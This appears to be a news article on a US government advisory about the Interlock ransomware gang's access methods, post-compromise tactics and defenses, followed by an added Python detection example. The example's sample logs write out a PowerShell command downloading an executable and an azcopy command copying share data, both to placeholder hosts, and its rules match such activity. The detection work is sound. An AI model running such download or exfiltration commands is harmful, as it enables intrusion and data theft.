The US government has warned businesses and critical infrastructure organizations to stay vigilant against wide-ranging attacks from the Interlock ransomware gang.
The joint advisory from four government agencies, including the FBI and the Department of Health and Human Services (HHS), highlighted the novel initial access techniques used by the cybercrime group.
These include “drive-by-download” and ClickFix social engineering techniques.
The group, first identified in late September 2024, has been observed targeting various business, critical infrastructure and other organizations in North America and Europe.
High-profile incidents attributed to Interlock in 2025 include Kettering Health, a major healthcare provider in western Ohio, US, and the Scottish local authority West Lothian Council.
Its favored tactic is double extortion, in which threat actors exfiltrate data as well as encrypt it, increasing the pressure on victims to pay a ransom demand.
The ransomware encryptors deployed are designed for both Windows and Linux operating systems.
“These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services,” the advisory, published on July 22, warned.
“Uncommon” Method for Initial Access
The FBI has observed Interlock using a technique called drive-by-download to obtain initial access, which was described as an “uncommon method among ransomware groups.”
This technique involves compromising legitimate websites so that they automatically install malware onto a victim’s device when visited.
Interlock actors have also used the ClickFix social engineering technique to gain initial access. This tactic involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it.
Post-compromise, affiliates deploy various methods for discovery, credential access and lateral movement.
A PowerShell script executes a series of commands designed to gather information on victim machines.
Once command and control (C2) is established, a series of PowerShell commands are used to download a credential stealer and keylogger binary. These tools collect various information to help facilitate access between systems, including login information and users’ keystrokes.
Remote desktop protocol (RDP) is also leveraged to facilitate lateral movement.
Data is then exfiltrated via AzCopy, a legitimate tool used to copy files, and various file transfer tools, including WinSCP.
Following exfiltration, Interlock launches ransomware encryptors.
Encrypted files are accompanied by a ransom note titled !__README__!.txt. Interlock affiliates do not leave an initial ransom demand or payment instructions in this note; instead, each victim is provided with a unique code and instructions to contact the ransomware actors via a .onion URL.
When contact is made, victims are instructed to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors.
The actors also threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand.
“The actors have previously followed through on this threat,” the agencies noted.
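The chain described above leaves several detection opportunities. As an added example (not code from the advisory or the article), the Python below runs a few constructed events in a hypothetical key=value log shape through rules keyed to the observables named here: PowerShell download commands after C2, RDP logons, AzCopy/WinSCP execution, and the !__README__!.txt note. Hostnames, paths and the example.invalid URLs are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a hypothetical key=value shape (not from the
# advisory or any real product); hosts, paths and example.invalid URLs are placeholders.
SAMPLE_EVENTS = [
    'ts=1 host=WS-07 type=proc image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell -c (New-Object Net.WebClient).DownloadFile(\'http://example.invalid/a\',\'a.exe\')"',
    'ts=2 host=FS-01 type=logon logon_type=10 src=WS-07 user=jdoe',
    'ts=3 host=FS-01 type=proc image=C:\\Tools\\azcopy.exe cmd="azcopy copy D:\\Share https://example.invalid/c"',
    'ts=4 host=FS-01 type=proc image="C:\\Program Files\\WinSCP\\WinSCP.exe" cmd="WinSCP.exe"',
    'ts=5 host=FS-01 type=file path=D:\\Share\\Finance\\!__README__!.txt',
    'ts=6 host=HR-02 type=proc image=C:\\Tools\\azcopy.exe cmd="azcopy copy D:\\HR https://example.invalid/b"',
]

def parse(line):
    """Split one event into a dict; values may be bare or double-quoted."""
    return {k: q or b for k, q, b in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)}

def classify(ev):
    """Map one event to a stage of the chain described above, or None if benign."""
    kind, image = ev.get("type"), ev.get("image", "").lower()
    exe, cmd = image.rsplit("\\", 1)[-1], ev.get("cmd", "").lower()
    if kind == "proc" and exe == "powershell.exe" and any(
            k in cmd for k in ("downloadfile", "downloadstring", "invoke-webrequest")):
        return "tooling_download"        # PowerShell fetching binaries once C2 is up
    if kind == "logon" and ev.get("logon_type") == "10":
        return "rdp_lateral_movement"    # Windows logon type 10 is RemoteInteractive (RDP)
    if kind == "proc" and exe in ("azcopy.exe", "winscp.exe"):
        return "staging_or_exfil"        # legitimate copy tools named as exfil channels
    if kind == "file" and ev.get("path", "").lower().endswith("!__readme__!.txt"):
        return "encryption_ransom_note"  # note dropped alongside encrypted files
    return None

def rate(stages):
    """Ransom note = encryption under way; >1 distinct earlier stage = intrusion in progress."""
    if "encryption_ransom_note" in stages:
        return "critical"
    return "high" if len(set(stages)) > 1 else "medium"

def correlate(lines):
    """Return {host: (severity, [stages in event order])} for hosts with any hit."""
    hits = defaultdict(list)
    for ev in map(parse, lines):
        stage = classify(ev)
        if stage:
            hits[ev["host"]].append(stage)
    return {host: (rate(stages), stages) for host, stages in hits.items()}
```

On the constructed input, FS-01 is rated critical because the note appears after RDP access and AzCopy/WinSCP activity, while a lone AzCopy run on HR-02 is only flagged for review.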
How to Defend Against Interlock Attacks
The advisory set out a range of recommendations for organizations to protect against the techniques used by Interlock. These include:
- Reduce the risk of drive-by-download by implementing domain name system (DNS) filtering to block users from accessing malicious sites
- Implement web access firewalls to mitigate and prevent unknown commands or process injection from malicious domains or websites
- Implement additional email security measures, including disabling hyperlinks in received emails
- Require all accounts with passwords to comply with National Institute of Standards and Technology (NIST) password guidance and implement multi-factor authentication (MFA) for all services
- Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems
- Maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented and secure location
- Segment networks to prevent the spread of ransomware